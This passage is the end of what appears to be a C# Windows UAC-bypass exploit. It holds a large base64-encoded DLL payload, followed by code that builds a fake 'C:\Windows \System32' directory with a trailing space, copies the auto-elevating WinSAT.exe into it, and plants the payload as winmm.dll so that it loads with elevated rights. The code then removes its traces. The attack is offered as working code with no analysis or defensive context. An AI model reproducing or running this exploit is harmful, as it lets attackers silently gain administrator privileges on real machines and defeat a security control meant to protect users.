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VCb3hXAFVTRVIzMi5kbGwAABUCT3BlblByb2Nlc3NUb2tlbgAAcAFHZXRUb2tlbkluZm9ybWF0aW9uAEFEVkFQSTMyLmRsbAAAjgI/X1hsZW5ndGhfZXJyb3JAc3RkQEBZQVhQRUJEQFoAAE1TVkNQMTQwLmRsbAAADgBfX0N4eEZyYW1lSGFuZGxlcjMAAAgAX19DX3NwZWNpZmljX2hhbmRsZXIAACEAX19zdGRfZXhjZXB0aW9uX2NvcHkAACIAX19zdGRfZXhjZXB0aW9uX2Rlc3Ryb3kAAQBfQ3h4VGhyb3dFeGNlcHRpb24AACUAX19zdGRfdHlwZV9pbmZvX2Rlc3Ryb3lfbGlzdAAAPgBtZW1zZXQAAFZDUlVOVElNRTE0MC5kbGwAADkAX2ludmFsaWRfcGFyYW1ldGVyX25vaW5mb19ub3JldHVybgAACABfY2FsbG5ld2gAGQBtYWxsb2MAADYAX2luaXR0ZXJtADcAX2luaXR0ZXJtX2UAGABmcmVlAAA/AF9zZWhfZmlsdGVyX2RsbAAYAF9jb25maWd1cmVfbmFycm93X2FyZ3YAADMAX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAA0AF9pbml0aWFsaXplX29uZXhpdF90YWJsZQAAIgBfZXhlY3V0ZV9vbmV4aXRfdGFibGUAFgBfY2V4aXQAAGFwaS1tcy13aW4tY3J0LXJ1bnRpbWUtbDEtMS0wLmRsbABhcGktbXMtd2luLWNydC1oZWFwLWwxLTEtMC5kbGwAAMsEUnRsQ2FwdHVyZUNvbnRleHQA0gRSdGxMb29rdXBGdW5jdGlvbkVudHJ5AADZBFJ0bFZpcnR1YWxVbndpbmQAALQFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAABzBVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgCSBVRlcm1pbmF0ZVByb2Nlc3MAAIQDSXNQcm9jZXNzb3JGZWF0dXJlUHJlc2VudABJBFF1ZXJ5UGVyZm9ybWFuY2VDb3VudGVyABwCR2V0Q3VycmVudFByb2Nlc3NJZAAgAkdldEN1cnJlbnRUaHJlYWRJZAAA7AJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQBnA0luaXRpYWxpemVTTGlzdEhlYWQAfQNJc0RlYnVnZ2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";

            //Disable filesystem redirection
            Wow64DisableWow64FsRedirection(ref wow64Value);

            //Create mock dirs
            Console.WriteLine("[+] Creating mock directories");
            try
            {
                CreateDirectory(@"\\?\C:\Windows \", IntPtr.Zero);
                CreateDirectory(@"\\?\C:\Windows \System32\", IntPtr.Zero);
            }
            catch
            {
                Console.WriteLine("[-] Unable to create the mock directories");
            }

            //Copy whitelisted EXE to mock dir
            Console.WriteLine("[+] Copying " + whitelistedExe + " to the mock directory");
            CopyFile(@"C:\Windows\System32\WinSAT.exe", @"C:\Windows \System32\WinSAT.exe", true);

            //Write user's DLL to temp and move it to the mock directory
            Console.WriteLine("[+] Writing your DLL to the mock directory");
            byte[] payloadDll = Convert.FromBase64String(payloadDllB64);
            File.WriteAllBytes(@"C:\temp\winmm.dll", payloadDll);
            CopyFile(@"C:\temp\winmm.dll", @"C:\Windows \System32\winmm.dll", true);

            //Execute
            Console.WriteLine("[+] Attempting to call the target EXE from the mock directory");

            SHELLEXECUTEINFO info = new SHELLEXECUTEINFO();
            info.cbSize = Marshal.SizeOf(info);
            info.lpVerb = "open";
            info.lpFile = "C:\\Windows \\System32\\WinSAT.exe";
            info.lpParameters = "formal";
            info.nShow = 5;
            info.fMask = 0x0000000c;
            ShellExecuteEx(ref info);

            //Cleanup
            DeleteFileW(@"C:\Windows \System32\winsat.exe");
            DeleteFileW(@"C:\Windows \System32\WINMM.dll");
            RemoveDirectory(@"C:\Windows \System32\");
            RemoveDirectory(@"C:\Windows \");

            //Reenable filesystem redirection
            Wow64RevertWow64FsRedirection(wow64Value);
        }
    }
}